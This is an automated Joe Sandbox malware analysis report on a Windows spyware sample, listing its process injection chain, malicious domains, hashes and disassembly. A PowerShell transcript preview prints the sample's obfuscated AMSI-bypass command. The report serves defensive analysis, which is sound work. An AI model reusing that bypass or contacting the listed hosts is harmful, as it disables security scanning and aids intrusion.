Domain Accounts | Shared Modules 1 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 131 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 712 | NTDS | Virtualization/Sandbox Evasion 131 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 11 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 2 | DCSync | System Information Discovery 111 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

          Behavior Graph

Behavior Graph ID: 452684 | Sample: s2rsXUiUn8 | Start date: 22/07/2021 | Architecture: WINDOWS | Score: 100

Top-level DNS: google.com
Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 4 other signatures

Process tree (child processes indented under their parent; "started" means a created process, "injected" an existing process written into):

• s2rsXUiUn8.exe, started. Signatures: Obfuscated command line found; Very long command line found
    • powershell.exe, started. Network: cdn.discordapp.com 162.159.134.233, 443, 49711, CLOUDFLARENETUS, United States. Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes to foreign memory regions; Injects a PE file into a foreign processes
        • calc.exe, started. Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
            • explorer.exe, injected. Network: rajuherbalandspicegarden.com 192.185.17.130, 49724, 80, UNIFIEDLAYER-AS-1US, United States; www.strawberrylinebikehire.com; www.rajuherbalandspicegarden.com. Signature: System process connects to network (likely due to code injection or exploit)
                • help.exe, started. Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    • cmd.exe, started
                        • conhost.exe, started
    • conhost.exe, started


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
s2rsXUiUn8.exe | 20% | Metadefender |
s2rsXUiUn8.exe | 57% | ReversingLabs | Win64.Spyware.Noon

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
9.2.calc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.rajuherbalandspicegarden.com/pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
www.homekeycap.com/pjje/ | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
google.com | 216.58.215.238 | true | false | | high
cdn.discordapp.com | 162.159.134.233 | true | false | | high
rajuherbalandspicegarden.com | 192.185.17.130 | true | true | | unknown
www.strawberrylinebikehire.com | unknown | unknown | true | | unknown
www.rajuherbalandspicegarden.com | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.rajuherbalandspicegarden.com/pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH | true | Avira URL Cloud: safe | unknown
www.homekeycap.com/pjje/ | true | Avira URL Cloud: safe | low

URLs from Memory and Binaries

Source for every row: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmp

Name | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | false | | high
http://www.fontbureau.com | false | | high
http://www.fontbureau.com/designersG | false | | high
http://www.fontbureau.com/designers/? | false | | high
http://www.founder.com.cn/cn/bThe | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | false | | high
http://www.tiro.com | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | false | | high
http://www.goodfont.co.kr | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | false | URL Reputation: safe | unknown
http://www.typography.netD | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | false | | high
http://www.founder.com.cn/cn/cThe | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | false | URL Reputation: safe | unknown
http://fontfabrik.com | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | false | | high
http://www.jiyu-kobo.co.jp/ | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | false | | high
http://www.fonts.com | false | | high
http://www.sandoll.co.kr | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | false | URL Reputation: safe | unknown
http://www.sakkal.com | false | URL Reputation: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.185.17.130 | rajuherbalandspicegarden.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
162.159.134.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 452684
Start date: 22.07.2021
Start time: 17:58:33
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 3s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: s2rsXUiUn8 (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@10/6@5/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 54% (good quality ratio 48.4%)
• Quality average: 73.4%
• Quality standard deviation: 32%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 92.122.145.220, 23.35.236.56, 20.82.209.183, 23.216.77.146, 23.216.77.132, 40.112.88.60, 20.50.102.62, 2.18.213.74, 2.18.213.56
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/452684/sample/s2rsXUiUn8.exe

                                        Simulations

                                        Behavior and APIs

Time | Type | Description
17:59:27 | API Interceptor | 42x Sleep call for process: powershell.exe modified

                                        Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
162.159.134.233 | VMKwliCGEP.rtf | malicious | cdn.discordapp.com/attachments/785611664095313920/785649743954706472/bin.exe

Domains

Match | Associated Sample Name / URL | Detection | Context
cdn.discordapp.com | PO20210722.xlsx | malicious | 162.159.130.233
cdn.discordapp.com | RIi1iCfuVK.exe | malicious | 162.159.130.233
cdn.discordapp.com | kkXJRT8vEl.exe | malicious | 162.159.134.233
cdn.discordapp.com | r3xwkKS58W.exe | malicious | 162.159.134.233
cdn.discordapp.com | P58w6OezJY.exe | malicious | 162.159.129.233
cdn.discordapp.com | 4QKHQR82Xt.exe | malicious | 162.159.134.233
cdn.discordapp.com | Swift_Fattura_0093320128_.exe | malicious | 162.159.130.233
cdn.discordapp.com | ySZpdJfqMO.exe | malicious | 162.159.129.233
cdn.discordapp.com | 6BeKYZk7bg.exe | malicious | 162.159.130.233
cdn.discordapp.com | Wcqwghjdefrkaiamzhtbgtpbmolvfnoxik.exe | malicious | 162.159.135.233
cdn.discordapp.com | Wcqwghjdefrkaiamzhtbgtpbmolvfnoxik.exe | malicious | 162.159.134.233
cdn.discordapp.com | Invoice 41319 from AGUA.exe | malicious | 162.159.130.233
cdn.discordapp.com | BoFA Remittance Advice-2021207.exe | malicious | 162.159.130.233
cdn.discordapp.com | WmI15xdQH8.exe | malicious | 162.159.135.233
cdn.discordapp.com | lpaBPnb1OB.exe | malicious | 162.159.133.233
cdn.discordapp.com | Hsbc Scan copy 3547856788 Pdf.exe | malicious | 162.159.130.233
cdn.discordapp.com | Statement.xlsx | malicious | 162.159.135.233
cdn.discordapp.com | PO20210719.docx | malicious | 162.159.135.233
cdn.discordapp.com | Wesnvuotnnnxvacefgejmjccyfnnrjmdmc.exe | malicious | 162.159.134.233
cdn.discordapp.com | Wesnvuotnnnxvacefgejmjccyfnnrjmdmc.exe | malicious | 162.159.133.233
google.com | PO20210722.xlsx | malicious | 216.58.215.238
google.com | ORD.ppt | malicious | 172.217.168.9
google.com | ORD.ppt | malicious | 172.217.168.9
google.com | rrnIEffG4c.exe | malicious | 172.217.168.36
google.com | Requesting Prices.exe | malicious | 172.217.168.36

ASN

Match | Associated Sample Name / URL | Detection | Context
UNIFIEDLAYER-AS-1US | 85vLO1Rpcy.exe | malicious | 162.241.62.54
UNIFIEDLAYER-AS-1US | v8kZUFgdD4.exe | malicious | 162.241.62.54
UNIFIEDLAYER-AS-1US | ovLjmo5UoE | malicious | 173.254.89.32
UNIFIEDLAYER-AS-1US | wREFu91LXZ.exe | malicious | 50.87.248.20
UNIFIEDLAYER-AS-1US | PURCHASE ORDER-890003.exe | malicious | 50.87.146.199
UNIFIEDLAYER-AS-1US | SvmxfeZM5Z | malicious | 192.254.185.125
UNIFIEDLAYER-AS-1US | ehn0f1d63M | malicious | 162.144.19.10
UNIFIEDLAYER-AS-1US | qt75NPEt0t | malicious | 50.87.73.248
UNIFIEDLAYER-AS-1US | e4qhQIKEim | malicious | 74.91.251.235
UNIFIEDLAYER-AS-1US | #U55aeInquiry RFQ_SK20211907.doc | malicious | 162.214.203.69
UNIFIEDLAYER-AS-1US | QxnlprRUTx.exe | malicious | 162.241.62.54
UNIFIEDLAYER-AS-1US | Af1Fnq4I4G | malicious | 76.162.184.193
UNIFIEDLAYER-AS-1US | FN0ZF2Nm21 | malicious | 173.83.209.249
UNIFIEDLAYER-AS-1US | DHL 07988 AWB 202107988.xlsx | malicious | 192.185.35.125
UNIFIEDLAYER-AS-1US | Order.exe | malicious | 108.179.243.90
UNIFIEDLAYER-AS-1US | Audit Notice.exe | malicious | 173.254.28.216
UNIFIEDLAYER-AS-1US | ohVyGMo5ga.exe | malicious | 192.185.121.104
UNIFIEDLAYER-AS-1US | UwQ0OtK2xW.exe | malicious | 50.87.218.82
UNIFIEDLAYER-AS-1US | pago.exe | malicious | 192.254.187.108
UNIFIEDLAYER-AS-1US | bank swift... Scan pdf.exe | malicious | 192.185.164.148

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
37f463bf4616ecd445d4a1937da06e19 | VNDRAUS20ARSHR0000067621.xlsx | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | V3FoZFwKDB.exe | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | kS2dqbsDwD.exe | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | Nb2HQZZDIf.exe | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | #U00e2_#U00e2_Play _to _Listen.htm | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | 41609787.exe | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | B5xK9XEvzO.exe | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | RsEvjI1iTt.exe | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | ORD.ppt | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | 39pfFwU3Ns.exe | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | 47a8af.exe.exe | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | Comprobante1.vbs | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | ZlvFNj.dll | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | QT2kxM315B.exe | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | 4QKHQR82Xt.exe | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | Convert HEX uit phishing mail.htm | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | #U2706_#U260e_Play _to _Listen.htm | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | 192-3216-Us.gt.com.html | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | N41101255652.vbs | malicious | 162.159.134.233
37f463bf4616ecd445d4a1937da06e19 | FILE_2932NH_9923.exe | malicious | 162.159.134.233

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\oad[1].jpg
                                        Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type: ASCII text, with very long lines, with no line terminators
                                        Category: dropped
                                        Size (bytes): 2026850
                                        Entropy (8bit): 4.762681838766658
                                        Encrypted: false
                                        SSDEEP: 12288:BgrUL/QryYqJOkK82HIUHvDcZIyy/hBc2T1odg+GfVwZQIzbiVgFvC4nPuoHMcnS:i
                                        MD5: 7E40951D41A43B25F38C6DD25DC4BFE3
                                        SHA1: D389E4ED359D16981FF0E05739AC4C4A96311C60
                                        SHA-256: 64A73E000DC919BC362CEA33F87549DA0D847C16F826E62138BF269006EF8C1C
                                        SHA-512: 17782CE108E5B7443D69CF024E497D33A3D9A2A39E155A34E3BD59832F447C31EF4DD75E2FAF1B381F38691CCF9E11FB6D579896D999E5097BE1700A5AA17E01
                                        Malicious: false
                                        Reputation: low
                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                        Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type: data
                                        Category: dropped
                                        Size (bytes): 11606
                                        Entropy (8bit): 4.883977562702998
                                        Encrypted: false
                                        SSDEEP: 192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                        MD5: 1F1446CE05A385817C3EF20CBD8B6E6A
                                        SHA1: 1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                        SHA-256: 2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                        SHA-512: 252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                        Malicious: false
                                        Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type: data
                                        Category: dropped
                                        Size (bytes): 1352
                                        Entropy (8bit): 5.370926585110904
                                        Encrypted: false
                                        SSDEEP: 24:3YPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJfMoOBq+Y:IPerB4nqRL/HvFe9t4Cv94afMoOBq+Y
                                        MD5: 5A7C43375E2B3C9D028C036F7E199FDF
                                        SHA1: 0B83ACEFE60D292C1A76DCEA7160D6E14D2FAA77
                                        SHA-256: 04DC7F291DA8492242C8386028CC4D8DAB5ADA6DDA60A08677495495E2A6F6A8
                                        SHA-512: 420D7C9467B1087D3E01BA4DFC76348DCDB97A61B5FA8A52BA167E566D4859220843EFDD64B650183BFA2E4D7E5C454FD21CF89D95F79AC13E671AAE8BC627AB
                                        Malicious: false
                                        Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pghm4uj.4m1.ps1
                                        Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type: very short file (no magic)
                                        Category: dropped
                                        Size (bytes): 1
                                        Entropy (8bit): 0.0
                                        Encrypted: false
                                        SSDEEP: 3:U:U
                                        MD5: C4CA4238A0B923820DCC509A6F75849B
                                        SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious: false
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlvkzbwx.aab.psm1
                                        Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type: very short file (no magic)
                                        Category: dropped
                                        Size (bytes): 1
                                        Entropy (8bit): 0.0
                                        Encrypted: false
                                        SSDEEP: 3:U:U
                                        MD5: C4CA4238A0B923820DCC509A6F75849B
                                        SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious: false
                                        Preview: 1
                                        C:\Users\user\Documents\20210722\PowerShell_transcript.965543.TYqX5dwv.20210722175925.txt
                                        Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                        Category: dropped
                                        Size (bytes): 10447
                                        Entropy (8bit): 4.196049168281877
                                        Encrypted: false
                                        SSDEEP: 192:l2Giw/GOrwwJYZbKIDFs+xS2Giw/GOrwwJYZbKIDFs+xrL99999L:Ezw/GOrwwJYgIDFVxlzw/GOrwwJYgIDX
                                        MD5: 2A0D140A36C556BC4C74DF793E698D99
                                        SHA1: 299D4F22830E4FF96EC8093F77B29C93779B9E41
                                        SHA-256: A090D1E73A91DDFD68E472ADD0FE24FBCF94505500A111CEF0D4642E529DA9CB
                                        SHA-512: 289F7991CD626D87AE6661820338737A85B486FA907D49696F1F62CCBE8EB707B7A22EF5AFA5FCEF18E140A19AF9E0E669F111D51FDCB6B04F54B420E51A20C3
                                        Malicious: false
                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210722175925..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 965543 (Microsoft Windows NT 10.0.17134.0)..Host Application: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,3

                                        Static File Info

                                        General

                                        File type: PE32+ executable (console) x86-64, for MS Windows
                                        Entropy (8bit): 6.055482508518817
                                        TrID:
                                        • Win64 Executable Console (202006/5) 92.64%
                                        • Win64 Executable (generic) (12005/4) 5.51%
                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                        • DOS Executable Generic (2002/1) 0.92%
                                        • VXD Driver (31/22) 0.01%
                                        File name: s2rsXUiUn8.exe
                                        File size: 26624
                                        MD5: f5041ec4ce468a07ecbfd076bc0f879b
                                        SHA1: bda8cea1ec8d1cea253fc661559cd84cee2195b9
                                        SHA256: caff14d450514a35eac5ba34b3e74126360662d7c8fdf60a8008a0e3bb8ed0b3
                                        SHA512: 4e64a727da994675aa7517f260d639691f6a94bc9c510ddde9d54f2f6e7f005b8b799eeea1d9aad1dc5128290654fa884a4aa0e397f96444914a067b8bd15c88
                                        SSDEEP: 768:ko9xN+bR7ftwwAqCnv/sx3OfEbR7t6ll:nPwbR8t/3MR7AP
                                        File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h..`..........'..........H................@............................................... ............................

                                        File Icon

                                        Icon Hash: 00828e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint: 0x4014e0
                                        Entrypoint Section: .text
                                        Digitally signed: false
                                        Imagebase: 0x400000
                                        Subsystem: windows cui
                                        Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                        DLL Characteristics:
                                        Time Stamp: 0x60F1F868 [Fri Jul 16 21:21:44 2021 UTC]
                                        TLS Callbacks: 0x40dba0
                                        CLR (.Net) Version:
                                        OS Version Major: 4
                                        OS Version Minor: 0
                                        File Version Major: 4
                                        File Version Minor: 0
                                        Subsystem Version Major: 4
                                        Subsystem Version Minor: 0
                                        Import Hash: eb4027891a3c2b24db6240a4f60e56ad

                                        Entrypoint Preview

                                        Instruction
                                        dec eax
                                        sub esp, 28h
                                        dec eax
                                        mov eax, dword ptr [00003FB5h]
                                        mov dword ptr [eax], 00000000h
                                        call 00007FEB90DF4A9Fh
                                        call 00007FEB90DF456Ah
                                        nop
                                        nop
                                        dec eax
                                        add esp, 28h
                                        ret
                                        nop dword ptr [eax+00h]
                                        nop word ptr [eax+eax+00000000h]
                                        dec eax
                                        sub esp, 28h
                                        call 00007FEB90DF5EACh
                                        dec eax
                                        test eax, eax
                                        sete al
                                        movzx eax, al
                                        neg eax
                                        dec eax
                                        add esp, 28h
                                        ret
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        dec eax
                                        lea ecx, dword ptr [00000009h]
                                        jmp 00007FEB90DF48B9h
                                        nop dword ptr [eax+00h]
                                        ret
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        nop
                                        push ebp
                                        dec eax
                                        mov ebp, esp
                                        dec eax
                                        sub esp, 30h
                                        mov dword ptr [ebp+10h], ecx
                                        dec eax
                                        mov dword ptr [ebp+18h], edx
                                        call 00007FEB90DF49F1h
                                        dec eax
                                        mov eax, dword ptr [00007CA5h]
                                        call eax
                                        dec eax
                                        mov dword ptr [ebp-08h], eax
                                        dec eax
                                        mov eax, dword ptr [ebp-08h]
                                        mov edx, 00000006h
                                        dec eax
                                        mov ecx, eax
                                        dec eax
                                        mov eax, dword ptr [00007E1Ch]
                                        call eax
                                        dec eax
                                        mov eax, dword ptr [ebp-08h]
                                        mov edx, 00000000h
                                        dec eax
                                        mov ecx, eax
                                        dec eax
                                        mov eax, dword ptr [00007E07h]
                                        call eax
                                        mov edx, 00000000h
                                        dec eax
                                        lea ecx, dword ptr [00002A59h]

                                        Data Directories

                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9000 | 0x7e8 | .idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xcc50 | 0x270 | .vmp0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x50a0 | 0x28 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x9200 | 0x1b0 | .idata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                        Sections

                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
